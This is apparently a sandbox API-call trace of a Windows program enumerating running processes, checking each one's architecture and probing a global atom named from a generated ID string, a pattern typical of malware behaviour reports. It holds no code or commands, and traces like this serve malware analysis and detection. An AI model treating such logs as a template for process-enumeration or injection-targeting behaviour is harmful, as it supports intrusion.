	[0073.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.888] CloseHandle (hObject=0x224) returned 1
	[0073.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.888] CloseHandle (hObject=0x224) returned 1
	[0073.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.888] CloseHandle (hObject=0x224) returned 1
	[0073.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.888] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.888] CloseHandle (hObject=0x224) returned 1
	[0073.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e680, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.889] CloseHandle (hObject=0x224) returned 1
	[0073.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.889] CloseHandle (hObject=0x224) returned 1
	[0073.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.889] CloseHandle (hObject=0x224) returned 1
	[0073.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.889] CloseHandle (hObject=0x224) returned 1
	[0073.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.889] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.890] CloseHandle (hObject=0x224) returned 1
	[0073.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.890] CloseHandle (hObject=0x224) returned 1
	[0073.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eab8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.890] CloseHandle (hObject=0x224) returned 1
	[0073.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eae0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.890] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.890] CloseHandle (hObject=0x224) returned 1
	[0073.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.890] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetLastError () returned 0x5
	[0073.891] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.892] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.892] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.892] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.893] GetLastError () returned 0x5
	[0073.894] GetLastError () returned 0x5
	[0073.894] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.894] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.894] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.894] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.894] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.894] CloseHandle (hObject=0x224) returned 1
	[0073.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.894] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.894] CloseHandle (hObject=0x224) returned 1
	[0073.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.895] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.895] CloseHandle (hObject=0x224) returned 1
	[0073.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.955] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.959] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.959] CloseHandle (hObject=0x224) returned 1
	[0073.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.960] CloseHandle (hObject=0x224) returned 1
	[0073.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.960] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.960] CloseHandle (hObject=0x224) returned 1
	[0073.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.961] CloseHandle (hObject=0x224) returned 1
	[0073.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.961] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.961] CloseHandle (hObject=0x224) returned 1
